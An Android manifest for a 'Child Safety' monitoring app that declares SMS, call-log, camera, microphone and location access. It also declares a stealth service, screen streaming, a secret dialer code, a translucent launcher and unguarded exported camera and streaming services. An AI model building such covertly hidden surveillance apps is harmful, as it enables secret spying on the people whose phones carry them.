<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.surokkhanet.child">

    <!-- Permissions -->
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_LOCATION" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.BIND_DEVICE_ADMIN"/>
    <uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_MEDIA_PROJECTION" />
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.POST_NOTIFICATIONS"/>
    <uses-permission android:name="android.permission.READ_MEDIA_IMAGES"/>
    <uses-permission android:name="android.permission.READ_MEDIA_VIDEO"/>
    <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    
    <!-- Usage stats and storage permissions -->
    <uses-permission android:name="android.permission.PACKAGE_USAGE_STATS"
        tools:ignore="ProtectedPermissions" />
    <uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE" />

    <application
        android:name="io.flutter.app.FlutterApplication"
        android:label="Child Safety"
        android:usesCleartextTraffic="true"
        android:icon="@mipmap/ic_launcher"
        android:requestLegacyExternalStorage="true"
        android:supportsRtl="true">
        
        <activity
            android:name=".MainActivity"
            android:exported="true"
            android:launchMode="singleTop"
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>

        <!-- Device Admin Receiver -->
        <receiver
            android:name=".DeviceAdminReceiver"
            android:permission="android.permission.BIND_DEVICE_ADMIN"
            android:exported="true"
            android:enabled="true">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/device_admin"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLED"/>
            </intent-filter>
        </receiver>

        <!-- Background Monitoring Service -->
        <service
            android:name=".BackgroundService"
            android:foregroundServiceType="location|camera|microphone"
            android:stopWithTask="false"
            android:enabled="true"
            android:exported="false" />

        <!-- Stealth Mode Service -->
        <service
            android:name=".StealthService"
            android:foregroundServiceType="location|camera|microphone"
            android:stopWithTask="false"
            android:enabled="true"
            android:exported="false" />

        <!-- Accessibility Service -->
        <service
            android:name=".ChildAccessibilityService"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
            android:exported="true"
            android:enabled="true">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessibility_service"/>
        </service>

        <!-- Notification Service -->
        <service
            android:name=".NotificationCatcher"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
            android:exported="true"
            android:enabled="true">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/notification_service_config"/>
        </service>

        <!-- Notification Listener Service -->
        <service
            android:name=".ContentFilterService"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"
            android:exported="true"
            android:enabled="true">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService" />
            </intent-filter>
        </service>

        <!-- Secret Code Receiver -->
        <receiver 
            android:name=".SecretReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.provider.Telephony.SECRET_CODE"/>
                <data android:scheme="android_secret_code" android:host="241051"/>
            </intent-filter>
        </receiver>

        <!-- Boot Receiver -->
        <receiver 
            android:name=".BootReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.REBOOT"/>
                <action android:name="android.intent.action.LOCKED_BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>

        <!-- Uninstall Handler -->
        <receiver 
            android:name=".UninstallHandler"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <action android:name="android.intent.action.PACKAGE_FULLY_REMOVED"/>
                <action android:name="android.intent.action.PACKAGE_DATA_CLEARED"/>
                <data android:scheme="package"/>
            </intent-filter>
        </receiver>

        <!-- Screen Streaming Service -->
        <service
            android:name=".ScreenStreamer"
            android:enabled="true"
            android:exported="true"
            android:permission="android.permission.FOREGROUND_SERVICE_MEDIA_PROJECTION"
            android:foregroundServiceType="mediaProjection">
            <intent-filter>
                <action android:name="com.surokkhanet.child.ACTION_START_STREAMING"/>
            </intent-filter>
        </service>
        
        <!-- Camera Controller Service -->
        <service
            android:name=".CameraController"
            android:enabled="true"
            android:exported="true"
            android:foregroundServiceType="camera">
            <intent-filter>
                <action android:name="com.surokkhanet.child.ACTION_CONTROL_CAMERA"/>
            </intent-filter>
        </service>
        
        <!-- Geofence Manager Service -->
        <service
            android:name=".GeofenceManager"
            android:enabled="true"
            android:exported="true"
            android:foregroundServiceType="location">
            <intent-filter>
                <action android:name="com.surokkhanet.child.ACTION_MANAGE_GEOFENCE"/>
            </intent-filter>
        </service>
        
        <!-- App Usage Stats Receiver -->
        <receiver 
            android:name=".AppUsageReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.app.usage.ACTION_USAGE_ACCESS_SETTINGS"/>
            </intent-filter>
        </receiver>
        
        <!-- Command Handler Service -->
        <service
            android:name=".CommandHandlerService"
            android:enabled="true"
            android:exported="false"/>
            
        <!-- Supabase Background Sync Service -->
        <service
            android:name=".SupabaseSyncService"
            android:enabled="true"
            android:exported="false">
            <intent-filter>
                <action android:name="com.surokkhanet.child.ACTION_SYNC_DATA"/>
            </intent-filter>
        </service>
    </application>
</manifest>